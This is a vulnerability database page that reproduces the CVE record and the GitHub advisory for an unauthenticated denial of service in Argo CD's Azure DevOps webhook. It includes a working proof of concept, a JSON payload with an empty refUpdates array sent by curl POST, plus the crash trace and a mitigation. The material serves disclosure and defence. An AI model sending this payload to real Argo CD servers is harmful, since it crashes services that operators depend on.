cvelistv5 - cve-2025-59538

cve-2025-59538

Vulnerability from cvelistv5

Published

2025-10-01 21:09

Modified

2025-10-02 15:54

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

Argo CD is Vulnerable to Unauthenticated Remote DoS via malformed Azure DevOps git.push webhook

References

▼	URL	Tags
	security-advisories@github.com	https://github.com/argoproj/argo-cd/commit/1a023f1ca7fe4ec942b4b6696804988d5a632baf
	security-advisories@github.com	https://github.com/argoproj/argo-cd/security/advisories/GHSA-gpx4-37g2-c8pv
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/argoproj/argo-cd/security/advisories/GHSA-gpx4-37g2-c8pv

Impacted products

▼	Vendor	Product
	argoproj	argo-cd

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-59538",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-10-02T15:32:22.380180Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-10-02T15:54:11.490Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-gpx4-37g2-c8pv"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "argo-cd",
          "vendor": "argoproj",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 2.9.0-rc1, \u003c 2.14.20"
            },
            {
              "status": "affected",
              "version": "\u003e= 3.2.0-rc1, \u003c 3.2.0-rc2"
            },
            {
              "status": "affected",
              "version": "\u003e= 3.1.0-rc1, \u003c 3.1.8"
            },
            {
              "status": "affected",
              "version": "\u003e= 3.0.0-rc1, \u003c 3.0.19"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. For versions 2.9.0-rc1 through 2.14.19, 3.0.0-rc1 through 3.2.0-rc1, 3.1.6 and 3.0.17, when the webhook.azuredevops.username and webhook.azuredevops.password are not set in the default configuration, the /api/webhook endpoint crashes the entire argocd-server process when it receives an Azure DevOps Push event whose JSON array resource.refUpdates is empty. The slice index [0] is accessed without a length check, causing an index-out-of-range panic. A single unauthenticated HTTP POST is enough to kill the process. This issue is resolved in versions 2.14.20, 3.2.0-rc2, 3.1.8 and 3.0.19."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-248",
              "description": "CWE-248: Uncaught Exception",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-703",
              "description": "CWE-703: Improper Check or Handling of Exceptional Conditions",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-10-01T21:09:08.870Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-gpx4-37g2-c8pv",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-gpx4-37g2-c8pv"
        },
        {
          "name": "https://github.com/argoproj/argo-cd/commit/1a023f1ca7fe4ec942b4b6696804988d5a632baf",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/argoproj/argo-cd/commit/1a023f1ca7fe4ec942b4b6696804988d5a632baf"
        }
      ],
      "source": {
        "advisory": "GHSA-gpx4-37g2-c8pv",
        "discovery": "UNKNOWN"
      },
      "title": "Argo CD is Vulnerable to Unauthenticated Remote DoS via malformed Azure DevOps git.push webhook"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-59538",
    "datePublished": "2025-10-01T21:09:08.870Z",
    "dateReserved": "2025-09-17T17:04:20.373Z",
    "dateUpdated": "2025-10-02T15:54:11.490Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-59538\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-10-01T21:16:43.800\",\"lastModified\":\"2025-10-02T19:11:46.753\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. For versions 2.9.0-rc1 through 2.14.19, 3.0.0-rc1 through 3.2.0-rc1, 3.1.6 and 3.0.17, when the webhook.azuredevops.username and webhook.azuredevops.password are not set in the default configuration, the /api/webhook endpoint crashes the entire argocd-server process when it receives an Azure DevOps Push event whose JSON array resource.refUpdates is empty. The slice index [0] is accessed without a length check, causing an index-out-of-range panic. A single unauthenticated HTTP POST is enough to kill the process. This issue is resolved in versions 2.14.20, 3.2.0-rc2, 3.1.8 and 3.0.19.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-248\"},{\"lang\":\"en\",\"value\":\"CWE-703\"}]}],\"references\":[{\"url\":\"https://github.com/argoproj/argo-cd/commit/1a023f1ca7fe4ec942b4b6696804988d5a632baf\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/argoproj/argo-cd/security/advisories/GHSA-gpx4-37g2-c8pv\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/argoproj/argo-cd/security/advisories/GHSA-gpx4-37g2-c8pv\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}"
  }
}

ghsa-gpx4-37g2-c8pv

Vulnerability from github

Published

2025-09-30 18:32

Modified

2025-10-01 21:37

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

Argo CD Unauthenticated Remote DoS via malformed Azure DevOps git.push webhook

Details

Summary

In the default configuration, webhook.azuredevops.username and webhook.azuredevops.password not set, Argo CD’s /api/webhook endpoint crashes the entire argocd-server process when it receives an Azure DevOps Push event whose JSON array resource.refUpdates is empty.

The slice index [0] is accessed without a length check, causing an index-out-of-range panic.

A single unauthenticated HTTP POST is enough to kill the process.

Details

go case azuredevops.GitPushEvent: // util/webhook/webhook.go -- line ≈147 revision = ParseRevision(payload.Resource.RefUpdates[0].Name) // panics if slice empty change.shaAfter = ParseRevision(payload.Resource.RefUpdates[0].NewObjectID) change.shaBefore= ParseRevision(payload.Resource.RefUpdates[0].OldObjectID) touchedHead = payload.Resource.RefUpdates[0].Name == payload.Resource.Repository.DefaultBranch

If the attacker supplies "refUpdates": [], the slice has length 0.

The webhook code has no recover(), so the panic terminates the entire binary.

PoC

payload-azure-empty.json: json { "eventType": "git.push", "resource": { "refUpdates": [], "repository": { "remoteUrl": "https://example.com/dummy", "defaultBranch": "refs/heads/master" } } }

curl call:

shell curl -k -X POST https://argocd.example.com/api/webhook \ -H 'X-Vss-ActivityId: 11111111-1111-1111-1111-111111111111' \ -H 'Content-Type: application/json' \ --data-binary @payload-azure-empty.json

Observed crash:

``` panic: runtime error: index out of range [0] with length 0

goroutine 205 [running]: github.com/argoproj/argo-cd/v3/util/webhook.affectedRevisionInfo webhook.go:147 +0x1ea5 ... ```

Mitigation

If you use Azure DevOps and need to handle webhook events, configure a webhook secret to ensure only trusted parties can invoke the webhook handler.

If you do not use Azure DevOps, you can set the webhook secrets to long, random values to effectively disable webhook handling for Azure DevOps payloads.

diff apiVersion: v1 kind: Secret metadata: name: argocd-secret type: Opaque data: + webhook.azuredevops.username: <your base64-encoded secret here> + webhook.azuredevops.password: <your base64-encoded secret here>

For more information

Open an issue in the Argo CD issue tracker or discussions
Join us on Slack in channel #argo-cd

Credits

Discovered by Jakub Ciolek at AlphaSense.

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.14.19"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/argoproj/argo-cd/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.9.0-rc1"
            },
            {
              "fixed": "2.14.20"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/argoproj/argo-cd/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.2.0-rc1"
            },
            {
              "fixed": "3.2.0-rc2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "3.2.0-rc1"
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.1.7"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/argoproj/argo-cd/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.1.0-rc1"
            },
            {
              "fixed": "3.1.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.0.18"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/argoproj/argo-cd/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0-rc1"
            },
            {
              "fixed": "3.0.19"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-59538"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-248",
      "CWE-703"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-30T18:32:31Z",
    "nvd_published_at": "2025-10-01T21:16:43Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nIn the default configuration, `webhook.azuredevops.username` and `webhook.azuredevops.password` not set, Argo CD\u2019s /api/webhook endpoint crashes the entire argocd-server process when it receives an Azure DevOps Push event whose JSON array resource.refUpdates is empty.\n\nThe slice index [0] is accessed without a length check, causing an index-out-of-range panic.\n\nA single unauthenticated HTTP POST is enough to kill the process.\n\n### Details\n\n```go\ncase azuredevops.GitPushEvent:\n    // util/webhook/webhook.go -- line \u2248147\n    revision        = ParseRevision(payload.Resource.RefUpdates[0].Name)        // panics if slice empty\n    change.shaAfter = ParseRevision(payload.Resource.RefUpdates[0].NewObjectID)\n    change.shaBefore= ParseRevision(payload.Resource.RefUpdates[0].OldObjectID)\n    touchedHead     = payload.Resource.RefUpdates[0].Name ==\n                      payload.Resource.Repository.DefaultBranch\n```\n\nIf the attacker supplies \"refUpdates\": [], the slice has length 0.\n\nThe webhook code has no recover(), so the panic terminates the entire binary.\n\n### PoC\n\npayload-azure-empty.json:\n```json\n{\n  \"eventType\": \"git.push\",\n  \"resource\": {\n    \"refUpdates\": [],\n    \"repository\": {\n      \"remoteUrl\": \"https://example.com/dummy\",\n      \"defaultBranch\": \"refs/heads/master\"\n    }\n  }\n}\n```\n\ncurl call:\n\n```shell\ncurl -k -X POST https://argocd.example.com/api/webhook \\\n     -H \u0027X-Vss-ActivityId: 11111111-1111-1111-1111-111111111111\u0027 \\\n     -H \u0027Content-Type: application/json\u0027 \\\n     --data-binary @payload-azure-empty.json\n```\n\nObserved crash:\n\n```\npanic: runtime error: index out of range [0] with length 0\n\ngoroutine 205 [running]:\ngithub.com/argoproj/argo-cd/v3/util/webhook.affectedRevisionInfo\n    webhook.go:147 +0x1ea5\n...\n```\n\n### Mitigation\n\nIf you use Azure DevOps and need to handle webhook events, configure a webhook secret to ensure only trusted parties can invoke the webhook handler.\n\nIf you do not use Azure DevOps, you can set the webhook secrets to long, random values to effectively disable webhook handling for Azure DevOps payloads.\n\n```diff\napiVersion: v1\nkind: Secret\nmetadata:\n  name: argocd-secret\ntype: Opaque\ndata:\n+  webhook.azuredevops.username: \u003cyour base64-encoded secret here\u003e\n+  webhook.azuredevops.password: \u003cyour base64-encoded secret here\u003e\n```\n\n### For more information\n\n* Open an issue in [the Argo CD issue tracker](https://github.com/argoproj/argo-cd/issues) or [discussions](https://github.com/argoproj/argo-cd/discussions)\n* Join us on [Slack](https://argoproj.github.io/community/join-slack) in channel #argo-cd\n\n### Credits\n\nDiscovered by Jakub Ciolek at AlphaSense.",
  "id": "GHSA-gpx4-37g2-c8pv",
  "modified": "2025-10-01T21:37:24Z",
  "published": "2025-09-30T18:32:31Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-gpx4-37g2-c8pv"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59538"
    },
    {
      "type": "WEB",
      "url": "https://github.com/argoproj/argo-cd/commit/1a023f1ca7fe4ec942b4b6696804988d5a632baf"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/argoproj/argo-cd"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Argo CD Unauthenticated Remote DoS via malformed Azure DevOps git.push webhook"
}

Action not permitted

cve-2025-59538

Vulnerability from cvelistv5

ghsa-gpx4-37g2-c8pv

Vulnerability from github

Summary

Details

PoC

Mitigation

For more information

Credits

Tags